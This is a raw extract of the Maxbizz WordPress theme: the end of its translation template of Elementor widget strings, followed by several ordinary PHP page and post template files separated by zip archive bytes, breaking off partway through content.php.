#: inc/backend/elementor/widgets/flip-box.php:163
#: inc/backend/elementor/widgets/flip-box.php:301
#: inc/backend/elementor/widgets/heading.php:226
#: inc/backend/elementor/widgets/icon-box-1.php:388
#: inc/backend/elementor/widgets/icon-box-1.php:540
#: inc/backend/elementor/widgets/icon-box-1.php:639
#: inc/backend/elementor/widgets/icon-box-2.php:378
#: inc/backend/elementor/widgets/icon-box-grid.php:284
#: inc/backend/elementor/widgets/icon-box-grid.php:320
#: inc/backend/elementor/widgets/image-box-carousel.php:319
#: inc/backend/elementor/widgets/image-box-carousel.php:525
#: inc/backend/elementor/widgets/image-box-carousel.php:577
#: inc/backend/elementor/widgets/image-box.php:218
#: inc/backend/elementor/widgets/message-box.php:165
#: inc/backend/elementor/widgets/message-box.php:201
#: inc/backend/elementor/widgets/portfolio-carousel.php:261
#: inc/backend/elementor/widgets/portfolio-carousel.php:366
#: inc/backend/elementor/widgets/portfolio-filter.php:258
#: inc/backend/elementor/widgets/portfolio-filter.php:540
#: inc/backend/elementor/widgets/portfolio-filter.php:705
#: inc/backend/elementor/widgets/post-carousel.php:241
#: inc/backend/elementor/widgets/post-carousel.php:439
#: inc/backend/elementor/widgets/post-carousel.php:491
#: inc/backend/elementor/widgets/pricing-table.php:202
#: inc/backend/elementor/widgets/pricing-table.php:257
#: inc/backend/elementor/widgets/pricing-table.php:330
#: inc/backend/elementor/widgets/pricing-table.php:374
#: inc/backend/elementor/widgets/progress-bars.php:263
#: inc/backend/elementor/widgets/switcher.php:105
#: inc/backend/elementor/widgets/tab-titles.php:107
#: inc/backend/elementor/widgets/tabs.php:119
#: inc/backend/elementor/widgets/team-1.php:330
#: inc/backend/elementor/widgets/team-1.php:453
#: inc/backend/elementor/widgets/team-2.php:278
#: inc/backend/elementor/widgets/team-2.php:339
#: inc/backend/elementor/widgets/team-2.php:386
#: inc/backend/elementor/widgets/team-3.php:246
#: inc/backend/elementor/widgets/team-3.php:355
#: inc/backend/elementor/widgets/team-3.php:416
#: inc/backend/elementor/widgets/team-3.php:463
#: inc/backend/elementor/widgets/team-carousel.php:405
#: inc/backend/elementor/widgets/team-carousel.php:466
#: inc/backend/elementor/widgets/team-carousel.php:513
#: inc/backend/elementor/widgets/team-carousel.php:602
#: inc/backend/elementor/widgets/team-carousel.php:654
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:319
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:381
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:462
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:514
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:301
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:363
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:444
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:497
#: inc/backend/elementor/widgets/video-button.php:294
msgid "Spacing"
msgstr ""

#: inc/backend/elementor/widgets/header/menu.php:91
msgid "Spacing Items"
msgstr ""

#: inc/backend/elementor/widgets/pricing-table.php:57
msgid "Standard"
msgstr ""

#: inc/backend/elementor/elementor.php:173
msgid "Sticky On/Off"
msgstr ""

#: inc/backend/elementor/widgets/countdown.php:174
#: inc/backend/elementor/widgets/counter-icon.php:129
#: inc/backend/elementor/widgets/counter.php:144
#: inc/backend/elementor/widgets/tab-titles.php:99
msgid "Style"
msgstr ""

#: inc/backend/elementor/widgets/icon-box-2.php:46
msgid "Style 1"
msgstr ""

#: inc/backend/elementor/widgets/progress-bars.php:47
msgid "Style 1: Line"
msgstr ""

#: inc/backend/elementor/widgets/icon-box-2.php:47
msgid "Style 2"
msgstr ""

#: inc/backend/elementor/widgets/progress-bars.php:48
msgid "Style 2: Circle"
msgstr ""

#: inc/backend/elementor/widgets/button.php:87
msgid "Style Color"
msgstr ""

#: inc/backend/elementor/widgets/contact-form7.php:85
msgid "Style Contact Form"
msgstr ""

#: inc/backend/elementor/widgets/portfolio-filter.php:42
msgid "Style Layout"
msgstr ""

#: inc/backend/elementor/widgets/client-logos.php:178
msgid "Style Logos"
msgstr ""

#: woocommerce/product-searchform.php:25
msgctxt "submit button"
msgid "Search"
msgstr ""

#: inc/backend/elementor/widgets/contact-form7.php:206
msgid "Submit Button CSS"
msgstr ""

#: inc/backend/elementor/widgets/contact-form7.php:218
msgid "Submit Button Hover CSS"
msgstr ""

#: inc/backend/elementor/widgets/heading.php:51
#: inc/backend/elementor/widgets/heading.php:136
msgid "Subtitle"
msgstr ""

#: inc/backend/elementor/widgets/heading.php:145
msgid "Subtitle Style"
msgstr ""

#: inc/backend/elementor/widgets/switcher.php:35
#: inc/backend/elementor/widgets/switcher.php:89
msgid "Switcher"
msgstr ""

#: inc/backend/elementor/widgets/tabs.php:72
msgid "Tab #1"
msgstr ""

#: inc/backend/elementor/widgets/tabs.php:76
msgid "Tab #2"
msgstr ""

#: inc/backend/elementor/widgets/tabs.php:57
#: inc/backend/elementor/widgets/tabs.php:58
msgid "Tab Content"
msgstr ""

#: inc/backend/elementor/widgets/tabs.php:47
#: inc/backend/elementor/widgets/tabs.php:48
msgid "Tab Title"
msgstr ""

#: inc/backend/elementor/widgets/pricing-table.php:127
msgid "Table"
msgstr ""

#: inc/backend/customizer/customizer.php:464
#: inc/backend/customizer/customizer.php:508
msgid "Tablet"
msgstr ""

#: inc/backend/elementor/widgets/tabs.php:36
msgid "Tabs"
msgstr ""

#: inc/backend/elementor/widgets/tabs.php:67
msgid "Tabs Items"
msgstr ""

#: inc/frontend/builder.php:96
msgid "take me home"
msgstr ""

#: inc/backend/elementor/widgets/team-carousel.php:36
msgid "Team"
msgstr ""

#: inc/backend/elementor/widgets/testimonials-carousel-1.php:35
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:35
msgid "Testimonials"
msgstr ""

#: inc/backend/elementor/widgets/progress-bars.php:247
msgid "Text"
msgstr ""

#: inc/backend/elementor/widgets/button.php:170
#: inc/backend/elementor/widgets/button.php:210
#: inc/backend/elementor/widgets/features-service.php:432
#: inc/backend/elementor/widgets/portfolio-filter.php:731
#: inc/backend/elementor/widgets/portfolio-filter.php:763
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:235
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:398
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:428
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:262
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:380
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:410
#: inc/backend/elementor/widgets/header/menu-mobile.php:127
#: inc/backend/elementor/widgets/header/menu.php:109
#: inc/backend/elementor/widgets/header/menu.php:216
msgid "Text Color"
msgstr ""

#: inc/backend/elementor/widgets/header/menu.php:131
#: inc/backend/elementor/widgets/header/menu.php:227
msgid "Text Hover Color"
msgstr ""

#: inc/backend/meta-boxes.php:75
msgid "Text Link"
msgstr ""

#: inc/backend/elementor/widgets/pricing-table.php:75
msgid "Text Under Price"
msgstr ""

#: inc/backend/elementor/widgets/contact-form7.php:134
msgid "Textarea CSS"
msgstr ""

#: inc/backend/elementor/widgets/countdown.php:227
msgid "Texts"
msgstr ""

#: inc/backend/elementor/widgets/accordions.php:73
#: inc/backend/elementor/widgets/accordions.php:77
msgid ""
"The basic philosophy of our studio is to create individual, aesthetically "
"stunning solutions for our customers by lightning-fast development of "
"projects employing unique styles."
msgstr ""

#: inc/backend/plugin-requires.php:76
#, php-format
msgid ""
"The following plugin needs to be updated to its latest version to ensure "
"maximum compatibility with this theme: %1$s."
msgid_plural ""
"The following plugins need to be updated to their latest version to ensure "
"maximum compatibility with this theme: %1$s."
msgstr[0] ""
msgstr[1] ""

#: inc/backend/plugin-requires.php:74
#, php-format
msgid "The following recommended plugin is currently inactive: %1$s."
msgid_plural "The following recommended plugins are currently inactive: %1$s."
msgstr[0] ""
msgstr[1] ""

#: inc/backend/plugin-requires.php:73
#, php-format
msgid "The following required plugin is currently inactive: %1$s."
msgid_plural "The following required plugins are currently inactive: %1$s."
msgstr[0] ""
msgstr[1] ""

#: inc/backend/elementor/widgets/contact-form7.php:94
msgid ""
"This is the global css for all fields of cf7. It will not effect the other "
"fileds but if you want to define things such as color, background color use "
"this."
msgstr ""

#: inc/backend/plugin-requires.php:71
#, php-format
msgid "This theme recommends the following plugin: %1$s."
msgid_plural "This theme recommends the following plugins: %1$s."
msgstr[0] ""
msgstr[1] ""

#: inc/backend/plugin-requires.php:70
#, php-format
msgid "This theme requires the following plugin: %1$s."
msgid_plural "This theme requires the following plugins: %1$s."
msgstr[0] ""
msgstr[1] ""

#: inc/backend/elementor/widgets/accordions.php:91
#: inc/backend/elementor/widgets/counter-icon.php:204
#: inc/backend/elementor/widgets/counter.php:181
#: inc/backend/elementor/widgets/features-service.php:203
#: inc/backend/elementor/widgets/features-service.php:244
#: inc/backend/elementor/widgets/features-service.php:325
#: inc/backend/elementor/widgets/flip-box.php:72
#: inc/backend/elementor/widgets/flip-box.php:155
#: inc/backend/elementor/widgets/heading.php:65
#: inc/backend/elementor/widgets/heading.php:244
#: inc/backend/elementor/widgets/icon-box-1.php:81
#: inc/backend/elementor/widgets/icon-box-1.php:533
#: inc/backend/elementor/widgets/icon-box-2.php:88
#: inc/backend/elementor/widgets/icon-box-2.php:475
#: inc/backend/elementor/widgets/icon-box-grid.php:99
#: inc/backend/elementor/widgets/icon-box-grid.php:312
#: inc/backend/elementor/widgets/image-box-carousel.php:75
#: inc/backend/elementor/widgets/image-box-carousel.php:311
#: inc/backend/elementor/widgets/image-box.php:87
#: inc/backend/elementor/widgets/image-box.php:210
#: inc/backend/elementor/widgets/message-box.php:55
#: inc/backend/elementor/widgets/message-box.php:193
#: inc/backend/elementor/widgets/portfolio-carousel.php:253
#: inc/backend/elementor/widgets/portfolio-filter.php:529
#: inc/backend/elementor/widgets/post-carousel.php:233
#: inc/backend/elementor/widgets/pricing-table.php:55
#: inc/backend/elementor/widgets/pricing-table.php:194
#: inc/backend/elementor/widgets/progress-bars.php:256
#: inc/backend/elementor/widgets/switcher.php:98
#: inc/backend/elementor/widgets/tab-titles.php:44
#: inc/backend/elementor/widgets/tabs.php:91
#: inc/backend/elementor/widgets/team-1.php:322
#: inc/backend/elementor/widgets/team-2.php:269
#: inc/backend/elementor/widgets/team-3.php:346
#: inc/backend/elementor/widgets/team-carousel.php:396
msgid "Title"
msgstr ""

#: inc/backend/elementor/widgets/features-service.php:107
msgid "Title #1"
msgstr ""

#: inc/backend/elementor/widgets/features-service.php:113
msgid "Title #2"
msgstr ""

#: inc/backend/elementor/widgets/accordions.php:45
#: inc/backend/elementor/widgets/features-service.php:74
msgid "Title & Content"
msgstr ""

#: inc/backend/elementor/widgets/tabs.php:45
msgid "Title & Description"
msgstr ""

#: inc/backend/customizer/customizer.php:415
#: inc/backend/elementor/widgets/icon-box-1.php:283
#: inc/backend/elementor/widgets/icon-box-2.php:233
#: inc/backend/elementor/widgets/icon-box-2.php:317
#: inc/backend/elementor/widgets/team-1.php:284
msgid "Title Color"
msgstr ""

#: inc/backend/elementor/widgets/switcher.php:66
msgid "Title Left"
msgstr ""

#: inc/woocommerce/woocommerce.php:323
msgid "Title Page Header"
msgstr ""

#: inc/backend/elementor/widgets/switcher.php:75
msgid "Title Right"
msgstr ""

#: inc/frontend/widgets/recent-posts.php:135
#: inc/backend/elementor/widgets/counter-icon.php:79
#: inc/backend/elementor/widgets/counter.php:94
msgid "Title:"
msgstr ""

#: inc/backend/elementor/widgets/tab-titles.php:35
msgid "Titles"
msgstr ""

#: inc/backend/elementor/widgets/switcher.php:143
msgid "Toggle"
msgstr ""

#: inc/backend/elementor/widgets/client-logos.php:189
#: inc/backend/elementor/widgets/counter.php:50
#: inc/backend/elementor/widgets/portfolio-filter.php:378
msgid "Top"
msgstr ""

#: inc/backend/elementor/widgets/icon-box-2.php:482
msgid "Top Spacing"
msgstr ""

#: inc/backend/customizer/customizer.php:607
msgid "Tumblr"
msgstr ""

#: inc/backend/customizer/customizer.php:602
#: inc/backend/elementor/widgets/team-1.php:124
#: inc/backend/elementor/widgets/team-2.php:124
#: inc/backend/elementor/widgets/team-3.php:124
msgid "Twitter"
msgstr ""

#: inc/frontend/template-tags.php:328
msgid "Twitter Handle"
msgstr ""

#: inc/backend/customizer/customizer.php:260
#: inc/backend/elementor/widgets/team-1.php:373
#: inc/backend/elementor/widgets/team-1.php:403
#: inc/backend/elementor/widgets/team-2.php:321
#: inc/backend/elementor/widgets/team-2.php:367
#: inc/backend/elementor/widgets/team-3.php:398
#: inc/backend/elementor/widgets/team-3.php:444
#: inc/backend/elementor/widgets/team-carousel.php:448
#: inc/backend/elementor/widgets/team-carousel.php:494
msgid "Typography"
msgstr ""

#: inc/backend/elementor/widgets/pricing-table.php:293
msgid "Under Price"
msgstr ""

#: inc/backend/elementor/widgets/countdown.php:77
msgid "UTC Timezone Offset"
msgstr ""

#: inc/backend/elementor/column.php:79
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:232
msgid "Vertical"
msgstr ""

#: inc/backend/elementor/widgets/client-logos.php:185
msgid "Vertical Align"
msgstr ""

#: inc/backend/meta-boxes.php:51
msgid "Video"
msgstr ""

#: inc/backend/elementor/widgets/video-button.php:69
msgid "Video Link"
msgstr ""

#: inc/woocommerce/woocommerce.php:197
#: inc/backend/elementor/widgets/header/cart.php:106
msgid "View your shopping cart"
msgstr ""

#: inc/backend/customizer/customizer.php:609
msgid "VK"
msgstr ""

#: inc/backend/elementor/widgets/tabs.php:73
#: inc/backend/elementor/widgets/tabs.php:77
msgid ""
"We help ambitious businesses like yours generate more profits by building "
"awareness, driving web traffic, connecting with customers, and growing "
"overall sales. Give us a call."
msgstr ""

#: inc/backend/elementor/widgets/message-box.php:67
msgid "We help ambitious businesses like yours generate."
msgstr ""

#: inc/backend/elementor/widgets/icon-box-1.php:111
#: inc/backend/elementor/widgets/icon-box-2.php:118
msgid "We will help you to get the result you dreamed of."
msgstr ""

#: inc/backend/elementor/widgets/heading.php:70
msgid "What we do"
msgstr ""

#: inc/backend/elementor/widgets/heading.php:154
#: inc/backend/elementor/widgets/image-box-carousel.php:594
#: inc/backend/elementor/widgets/post-carousel.php:508
#: inc/backend/elementor/widgets/progress-bars.php:337
#: inc/backend/elementor/widgets/tabs.php:98
#: inc/backend/elementor/widgets/team-carousel.php:671
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:531
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:515
#: inc/backend/elementor/widgets/header/logo.php:78
#: inc/backend/elementor/widgets/header/menu.php:161
#: inc/backend/elementor/widgets/header/search.php:80
#: inc/backend/elementor/widgets/header/side-panel.php:80
msgid "Width"
msgstr ""

#: inc/backend/elementor/widgets/switcher.php:77
msgid "Yearly"
msgstr ""

#: inc/backend/elementor/widgets/client-logos.php:109
#: inc/backend/elementor/widgets/client-logos.php:121
#: inc/backend/elementor/widgets/client-logos.php:153
#: inc/backend/elementor/widgets/client-logos.php:165
#: inc/backend/elementor/widgets/image-box-carousel.php:171
#: inc/backend/elementor/widgets/image-box-carousel.php:183
#: inc/backend/elementor/widgets/image-box-carousel.php:215
#: inc/backend/elementor/widgets/image-box-carousel.php:227
#: inc/backend/elementor/widgets/portfolio-carousel.php:88
#: inc/backend/elementor/widgets/portfolio-carousel.php:100
#: inc/backend/elementor/widgets/portfolio-carousel.php:112
#: inc/backend/elementor/widgets/portfolio-carousel.php:144
#: inc/backend/elementor/widgets/portfolio-carousel.php:156
#: inc/backend/elementor/widgets/portfolio-carousel.php:242
#: inc/backend/elementor/widgets/portfolio-filter.php:208
#: inc/backend/elementor/widgets/portfolio-filter.php:445
#: inc/backend/elementor/widgets/post-carousel.php:108
#: inc/backend/elementor/widgets/post-carousel.php:120
#: inc/backend/elementor/widgets/post-carousel.php:152
#: inc/backend/elementor/widgets/post-carousel.php:164
#: inc/backend/elementor/widgets/pricing-table.php:45
#: inc/backend/elementor/widgets/pricing-table.php:432
#: inc/backend/elementor/widgets/team-carousel.php:216
#: inc/backend/elementor/widgets/team-carousel.php:228
#: inc/backend/elementor/widgets/team-carousel.php:260
#: inc/backend/elementor/widgets/team-carousel.php:272
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:138
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:150
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:182
#: inc/backend/elementor/widgets/testimonials-carousel-1.php:194
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:148
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:160
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:192
#: inc/backend/elementor/widgets/testimonials-carousel-2.php:220
#: inc/backend/elementor/widgets/video-button.php:88
msgid "Yes"
msgstr ""

#: inc/backend/elementor/widgets/icon-box-grid.php:111
#: inc/backend/elementor/widgets/icon-box-grid.php:134
#: inc/backend/elementor/widgets/icon-box-grid.php:140
#: inc/backend/elementor/widgets/icon-box-grid.php:146
msgid ""
"You can provide the answers that your potential customers are trying to find,"
" so you can become the industry."
msgstr ""

#: inc/frontend/template-tags.php:210
msgid "Your comment is awaiting moderation."
msgstr ""

#: inc/frontend/template-tags.php:329
msgid "Youtube Channel"
msgstr ""
PK�8FZ6����page-templates/shop-page.phpnu�[���<?php
/**
 *
 * Template Name: Checkout & Cart Page
 * Description: A Page Template with a design.
 *
 * @link https://developer.wordpress.org/themes/basics/template-hierarchy/
 *
 * @package Maxbizz
 */

get_header();
?>
    
<div class="entry-content">
    <div class="container">
        <div class="row">
            <div id="primary" class="content-area col-md-12">
                <main id="main" class="site-main">

                <?php
                while ( have_posts() ) : the_post();

                    the_content();

                endwhile; // End of the loop.
                ?>

                </main><!-- #main -->
            </div><!-- #primary -->
        </div>
    </div>
</div>

<?php
get_footer();PK�8FZ�V�x!template-parts/content-search.phpnu�[���<?php
/**
 * Template part for displaying results in search pages
 *
 * @link https://developer.wordpress.org/themes/basics/template-hierarchy/
 *
 * @package Maxbizz
 */

?>

<article id="post-<?php the_ID(); ?>" <?php post_class('post-box'); ?>>
    <div class="post-inner">
        <div class="inner-post">
	        <div class="entry-header">

	            <?php the_title( '<h4 class="entry-title"><a class="title-link" href="' . esc_url( get_permalink() ) . '" rel="bookmark">', '</a></h4>' ); ?>

	        </div><!-- .entry-header -->

	        <div class="entry-summary the-excerpt">

	            <?php the_excerpt(); ?>

	        </div><!-- .entry-content -->
		</div>
		<?php if ( 'post' === get_post_type() ) : ?>
		<div class="entry-meta">
			<?php if( maxbizz_get_option( 'post_entry_meta' ) ) { maxbizz_post_meta(); } ?>
	        <a href="<?php the_permalink(); ?>" class="btn-details"><i class="ot-flaticon-trajectory"></i></a>
		</div><!-- .entry-meta -->
		<?php endif; ?>
    </div>
</article>
PK�8FZw�%���template-parts/content-none.phpnu�[���<?php
/**
 * Template part for displaying a message that posts cannot be found
 *
 * @link https://developer.wordpress.org/themes/basics/template-hierarchy/
 *
 * @package Maxbizz
 */

?>

<section class="no-results not-found">
	
	<h1 class="page-title"><?php esc_html_e( 'Nothing Found', 'maxbizz' ); ?></h1>

	<div class="page-content">
		<?php
		if ( is_home() && current_user_can( 'publish_posts' ) ) :

			printf(
				'<p>' . wp_kses(
					/* translators: 1: link to WP admin new post page. */
					__( 'Ready to publish your first post? <a href="%1$s">Get started here</a>.', 'maxbizz' ),
					array(
						'a' => array(
							'href' => array(),
						),
					)
				) . '</p>',
				esc_url( admin_url( 'post-new.php' ) )
			);

		elseif ( is_search() ) :
			?>

			<p><?php esc_html_e( 'Sorry, but nothing matched your search terms. Please try again with some different keywords.', 'maxbizz' ); ?></p>
			<?php
			get_search_form();

		else :
			?>

			<p><?php esc_html_e( 'It seems we can&rsquo;t find what you&rsquo;re looking for. Perhaps searching can help.', 'maxbizz' ); ?></p>
			<?php
			get_search_form();

		endif;
		?>
	</div><!-- .page-content -->
</section><!-- .no-results -->
PK�8FZҕ��"template-parts/content-project.phpnu�[���<?php 
	$cates = get_the_terms(get_the_ID(),'portfolio_cat');
    $cate_id   = '';
    if($cates){
	    foreach((array)$cates as $cate){
	        $cate_id   .= 'category-' . $cate->term_id . ' ';
	    }
	}
?>
<div class="project-item <?php echo esc_attr( $cate_id ); ?>">
	<div class="projects-box">
		<div class="projects-thumbnail" data-src="<?php echo esc_url(get_the_post_thumbnail_url()); ?>" data-sub-html="<?php the_title(); ?>">
			<a href="<?php the_permalink(); ?>">
				<?php
					if ( has_post_thumbnail() ) {
						the_post_thumbnail( 'maxbizz-portfolio-thumbnail-grid' );
					}
				?>
			</a>
			<span class="overlay"><i class="ot-flaticon-signs"></i></span>
		</div>
		<div class="portfolio-info">
			<a href="<?php the_permalink(); ?>" class="overlay"></a>
			<div class="portfolio-info-inner">
				<a href="<?php the_permalink(); ?>" class="plus"><i class="ot-flaticon-signs"></i></a>
				<h5><a class="title-link" href="<?php the_permalink(); ?>"><?php the_title(); ?></a></h5>
				<?php 
					if ( ! is_wp_error( $cates ) && ! empty( $cates ) ) :
						echo '<p class="portfolio-cates">';	 
						foreach ( (array)$cates as $term ) {
							// The $term is an object, so we don't need to specify the $taxonomy.
							$term_link = get_term_link( $term );
							// If there was an error, continue to the next term.
							if ( is_wp_error( $term_link ) ) {
								continue;
							}
							// We successfully got a link. Print it out.
							echo '<span> / </span><a href="' . esc_url( $term_link ) . '">' . $term->name . '</a>';
						}		                         
						
						echo '</p>';    
					endif; 
				?> 
			</div>
		</div>
	</div>
</div>PK�8FZ��}���template-parts/content-page.phpnu�[���<?php
/**
 * Template part for displaying page content in page.php
 *
 * @link https://developer.wordpress.org/themes/basics/template-hierarchy/
 *
 * @package Maxbizz
 */

?>

<article id="post-<?php the_ID(); ?>" <?php post_class(); ?>>
	<div class="inner-post">
	    <?php
	    
	    the_content();

	    wp_link_pages( array(
	        'before' => '<div class="page-links">' . esc_html__( 'Pages:', 'maxbizz' ),
	        'after'  => '</div>',
	    ) );
	    ?>
	</div>
</article>PK�8FZp�EjSS!template-parts/content-header.phpnu�[���<!-- #site-header-open -->
<header id="site-header" class="site-header <?php maxbizz_header_class(); ?>">

    <!-- #header-desktop-open -->
    <?php maxbizz_header_builder(); ?>
    <!-- #header-desktop-close -->

    <!-- #header-mobile-open -->
    <?php maxbizz_mobile_builder(); ?>
    <!-- #header-mobile-close -->

</header>
<!-- #site-header-close -->
<!-- #side-panel-open -->
<?php if( maxbizz_get_option('sidepanel_layout') ) { ?>
    <div id="side-panel" class="side-panel <?php if( maxbizz_get_option('panel_left') ) echo 'on-left'; ?>">
        <a href="#" class="side-panel-close"><i class="ot-flaticon-cancel"></i></a>
        <div class="side-panel-block">
            <?php if ( did_action( 'elementor/loaded' ) ) maxbizz_sidepanel_builder(); ?>	
        </div>
    </div>
<?php } ?>
<!-- #side-panel-close -->PK�8FZ8��u��+template-parts/content-project-carousel.phpnu�[���<?php $cates = get_the_terms(get_the_ID(),'portfolio_cat'); ?>
<div class="project-items">
	<div class="projects-box">
		<div class="projects-thumbnail">
			<a href="<?php the_permalink(); ?>">
				<?php 
					if( function_exists( 'rwmb_meta' ) ) { 
					$images = rwmb_meta( 'slide_img', array( 'size' =>'full' ) );
					foreach ( $images as $image ) {
				?>
				<img src="<?php echo esc_url( $image['url'] ); ?>" alt="<?php echo esc_attr( $image['alt'] ); ?>" width="<?php echo esc_attr( $image['width'] ); ?>" height="<?php echo esc_attr( $image['height'] ); ?>">
				<?php } } ?>
			</a>
		</div>
		<div class="portfolio-info">
			<div class="portfolio-info-inner">
				<h5><a href="<?php the_permalink(); ?>"><?php the_title(); ?></a></h5>
				<?php 
					if ( ! is_wp_error( $cates ) && ! empty( $cates ) ) :
						echo '<p class="portfolio-cates">';	 
						foreach ( (array)$cates as $term ) {
							// The $term is an object, so we don't need to specify the $taxonomy.
							$term_link = get_term_link( $term );
							// If there was an error, continue to the next term.
							if ( is_wp_error( $term_link ) ) {
								continue;
							}
							// We successfully got a link. Print it out.
							echo '<span> / </span><a href="' . esc_url( $term_link ) . '">' . $term->name . '</a>';
						}		                         
						
						echo '</p>';    
					endif; 
				?> 
			</div>
		</div>
	</div>
</div>PK�8FZ�s�M��!template-parts/content-single.phpnu�[���<?php
/**
 * Template part for displaying single post content
 *
 * @link https://developer.wordpress.org/themes/basics/template-hierarchy/
 *
 * @package Maxbizz
 */

?>

<?php                                                     
	$format = get_post_format();
	$link_video  = get_post_meta(get_the_ID(),'post_video', true);
	$link_audio  = get_post_meta(get_the_ID(),'post_audio', true);
	$link_link   = get_post_meta(get_the_ID(),'post_link', true);
	$text_link   = get_post_meta(get_the_ID(),'text_link', true);
	$quote_text  = get_post_meta(get_the_ID(),'post_quote', true);
	$quote_name  = get_post_meta(get_the_ID(),'quote_name', true);
?> 

<article id="post-<?php the_ID(); ?>" <?php post_class('blog-post post-box'); ?>>
    <?php if( $format == 'gallery' ) { ?>

        <div class="entry-media">
            <?php maxbizz_posted_in(); ?>
            <div class="gallery-post owl-carousel owl-theme">
            <?php if( function_exists( 'rwmb_meta' ) ) { ?>
                <?php $images = rwmb_meta( 'post_gallery', array( 'size' =>'full' ) ); ?>
                <?php if($images){ ?>              
                    <?php foreach ( $images as $image ) {  ?>		
                        <div class="item-image">
                            <img src="<?php echo esc_url( $image['url'] ); ?>" alt="<?php echo esc_attr( $image['alt'] ); ?>" width="<?php echo esc_attr( $image['width'] ); ?>" height="<?php echo esc_attr( $image['height'] ); ?>">
                        </div>                
                    <?php } ?>                
                <?php } ?>
            <?php } ?>
            </div>
        </div>			

    <?php }elseif( $format == 'image' ) { ?>

        <div class="entry-media">
        <?php maxbizz_posted_in(); ?>
        <?php if( function_exists( 'rwmb_meta' ) ) { ?>
            <?php $images = rwmb_meta( 'post_image', array( 'size' =>'full' ) ); ?>
            <?php if($images){ ?>              
                <?php foreach ( $images as $image ) {  ?>				            
                    <a href="<?php the_permalink(); ?>">
                        <img src="<?php echo esc_url( $image['url'] ); ?>" alt="<?php echo esc_attr( $image['alt'] ); ?>" width="<?php echo esc_attr( $image['width'] ); ?>" height="<?php echo esc_attr( $image['height'] ); ?>">
                    </a>
                <?php } ?>                
            <?php } ?>
        <?php } ?>
        </div>

    <?php }elseif( $format == 'audio' ){ ?>

        <div class="audio-box padding-box">
        <iframe scrolling="no" frameborder="no" src="<?php echo esc_url( $link_audio ); ?>"></iframe>
        </div>

    <?php }elseif( $format == 'video' ){ ?>

        <div class="entry-media">
            <?php maxbizz_posted_in(); ?>
            <?php if( function_exists( 'rwmb_meta' ) ) { ?>
                <?php $images = rwmb_meta( 'bg_video', array( 'size' =>'full' ) ); ?>
                <?php if($images){ ?>     
                    <div class="video-popup">        
                        <a class="btn-play" href="<?php echo esc_url( $link_video ); ?>">
                            <i class="ot-flaticon-play"></i>
                        </a> 
                    </div>
                    <?php  foreach ( $images as $image ) {  ?>
                        <img src="<?php echo esc_url( $image['url'] ); ?>" alt="<?php echo esc_attr( $image['alt'] ); ?>" width="<?php echo esc_attr( $image['width'] ); ?>" height="<?php echo esc_attr( $image['height'] ); ?>">
                    <?php } ?>                
                <?php } ?>
            <?php } ?>
        </div>

    <?php }elseif( $format == 'link' ){ ?>

        <div class="link-box padding-box">
            <i class="ot-flaticon-multimedia"></i>
            <a href="<?php echo esc_url( $link_link ); ?>"><?php echo esc_html( $text_link ); ?></a>
        </div>

        <?php }elseif( $format == 'quote' ){ ?>

        <div class="quote-box padding-box font-second">
            <i class="ot-flaticon-left-quote"></i>
            <div class="quote-text">
                <?php echo esc_html( $quote_text ); ?>
                <span><?php echo esc_html( $quote_name ); ?></span>
            </div>
        </div>

    <?php }elseif ( has_post_thumbnail() ) { ?>

        <div class="entry-media">
            <?php maxbizz_posted_in(); ?>
            <a href="<?php the_permalink(); ?>">
                <?php the_post_thumbnail(); ?>
            </a>
        </div>

    <?php } ?>

    <div class="inner-post <?php if( !has_post_thumbnail() ) echo 'no-ptop'; ?>">
        <?php if( $format != 'gallery' && $format != 'image' && $format != 'video' && !has_post_thumbnail() ) maxbizz_posted_in(); ?>
        <div class="entry-header">
            <div class="entry-meta">
                <?php if( maxbizz_get_option( 'post_entry_meta' ) ) { maxbizz_post_meta(); } ?>
            </div>
            <?php if( maxbizz_get_option( 'ptitle_post' ) ) the_title( '<h4 class="entry-title">', '</h4>' ); ?>

        </div>

        <div class="entry-summary">

            <?php

                the_content(sprintf(
                    wp_kses(
                    /* translators: %s: Name of current post. Only visible to screen readers */
                        __('Continue reading<span class="screen-reader-text"> "%s"</span>', 'maxbizz'),
                        array(
                            'span' => array(
                                'class' => array(),
                            ),
                        )
                    ),
                    get_the_title()
                ));

                wp_link_pages(array(
                    'before' => '<div class="page-links">' . esc_html__('Pages:', 'maxbizz'),
                    'after' => '</div>',
                ));
            ?>

        </div>
        <div class="entry-footer clearfix">
            <?php maxbizz_entry_footer(); ?>
        </div>
        <?php if( maxbizz_get_option('author_box') ) maxbizz_author_info_box(); ?>
        <?php if( maxbizz_get_option('post_nav') ) maxbizz_single_post_nav(); ?>
        <?php if( maxbizz_get_option('related_post') ) maxbizz_related_posts(); ?>
    </div>

</article>
PK�8FZ��
���template-parts/content.phpnu�[���<?php
/**
 * Template part for displaying posts
 *
 * @link https://developer.wordpress.org/themes/basics/template-hierarchy/
 *
 * @package Maxbizz
 */

?>

<?php                                                     
	$format = get_post_format();
	$link_video  = get_post_meta(get_the_ID(),'post_video', true);
	$link_audio  = get_post_meta(get_the_ID(),'post_audio', true);
	$link_link   = get_post_meta(get_the_ID(),'post_link', true);
	$text_link   = get_post_meta(get_the_ID(),'text_link', true);
	$quote_text  = get_post_meta(get_the_ID(),'post_quote', true);
	$quote_name  = get_post_meta(get_the_ID(),'quote_name', true);
?> 

<article id="post-<?php the_ID(); ?>" <?php post_class('post-box'); ?>>

